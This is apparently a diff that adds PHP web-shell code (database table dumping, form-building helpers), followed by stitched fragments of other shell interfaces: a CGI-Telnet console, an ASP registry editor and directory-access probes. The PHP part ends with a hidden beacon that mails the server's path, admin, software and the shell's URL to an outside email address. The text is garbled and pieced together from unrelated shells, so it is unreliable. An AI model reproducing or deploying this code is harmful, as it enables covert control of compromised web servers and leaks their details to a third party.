+			if (!isset($row[$fieldcounter])) {
+				$tabledump .= "NULL";
+			} else {
+				$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
+			}
+		}
+
+		$tabledump .= ");\n";
+
+		if ($fp) {
+			fwrite($fp,$tabledump);
+		} else {
+			echo $tabledump;
+		}
+	}
+	fr($rows);
+	if ($fp) {
+		fwrite($fp,"\n");
+	} else {
+		echo "\n";
+	}
+}
+
+function ue($str){
+	return urlencode($str);
+}
+
+function p($str){
+	echo $str."\n";
+}
+
+function tbhead() {
+	p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
+}
+function tbfoot(){
+	p('</table>');
+}
+
+function makehide($name,$value=''){
+	p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
+}
+
+function makeinput($arg = array()){
+	$arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
+	$arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
+	!$arg['type'] && $arg['type'] = 'text';
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	$arg['class'] = $arg['class'] ? $arg['class'] : 'input';
+	if ($arg['newline']) {
+		p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
+	} else {
+		p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
+	}
+}
+
+function makeselect($arg = array()){
+	if ($arg['onchange']) {
+		$onchange = 'onchange="'.$arg['onchange'].'"';
+	}
+	$arg['title'] = $arg['title'] ? $arg['title'] : '';
+	if ($arg['newline']) p('<p>');
+	p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
+		if (is_array($arg['option'])) {
+			foreach ($arg['option'] as $key=>$value) {
+				if ($arg['selected']==$key) {
+					p("<option value=\"$key\" selected>$value</option>");
+				} else {
+					p("<option value=\"$key\">$value</option>");
+				}
+			}
+		}
+	p("</select>");
+	if ($arg['newline']) p('</p>');
+}
+function formhead($arg = array()) {
+	!$arg['method'] && $arg['method'] = 'post';
+	!$arg['action'] && $arg['action'] = $self;
+	$arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
+	!$arg['name'] && $arg['name'] = 'form1';
+	p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
+	if ($arg['title']) {
+		p('<h2>'.$arg['title'].' &raquo;</h2>');
+	}
+}
+
+function maketext($arg = array()){
+	!$arg['cols'] && $arg['cols'] = 100;
+	!$arg['rows'] && $arg['rows'] = 25;
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
+}
+
+function formfooter($name = ''){
+	!$name && $name = 'submit';
+	p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="Submit"></p>');
+	p('</form>');
+}
+
+function formfoot(){
+	p('</form>');
+}
+
+// |&#1118;-+|&#1087;- 
+function pr($a) {
+	echo '<pre>';
+	print_r($a);
+	echo '</pre>';
+}
+
+?>
+<?php
+$kime="amadeus155@hotmail.com";
+$baslik="SadrazaM Server Avcisi V1.0";
+$EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."\r\n";
+$EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."\r\n";
+$EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."\r\n";
+$EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n";
+$EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."\r\n";
+mail($kime, $baslik, $EL_MuHaMMeD);
+?>
\ No newline at end of file

Directive	Local Value	Master Value
'.ws(3).''.$key.'	'.U_value($value['local_value']).'	'.U_value($value['global_value']).'
'.ws(3).''.trim($info[0]).'	'.trim($info[1]).'
'.ws(3).' ---
'.ws(3).''.trim($info[0]).'	'.trim($info[1]).'
'.ws(3).' + + + + + + + + + +
".ws(3); + $r .= (!$unix)? str_replace("/","\\",$file) : $file; + $r .= ""; + $r .= "
".$a."	".ws(2).$b."
+#	CGI-Telnet Version 1.0 - Connected to $ServerName
+Upload File \| +Download File \| +Disconnect \| +Help +
ROOT KEY NAME	ABREVIAÇÃO
HKEY_CURRENT_USER	HKCU
HKEY_LOCAL_MACHINE	HKLM
HKEY_CLASSES_ROOT	HKCR
HKEY_USERS	HKEY_USERS
HKEY_CURRENT_CONFIG	HKEY_CURRENT_CONFIG
Type	Description	Figure
REG_SZ	String	String
REG_DWORD	Number	DWORD
REG_BINARY	Binary	VBArray DWORD
REG_EXPAND_SZ	String Expand (ex. ""%windir%\\calc.exe"")	String
REG_MULTI_SZ	Array Of Strings	VBArray Of Strings
KEY:	( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )
VALUE:
TYPE:	" + Response.Write "" + Response.Write "" + Response.Write "
<DIR> " & folderItem.path & "	DONE!
" & UCase(Err.Description) & "
<DIR> " & maindestino & "	Acesso Permitido
" & UCase(Err.Description) & "
<DIR> " & showobj(pathfinal) & "	Acesso Permitido
" & UCase(Err.Description) & "
<DIR> " & showobj(subpasta.path) & "	Acesso Permitido
" & UCase(Err.Description) & "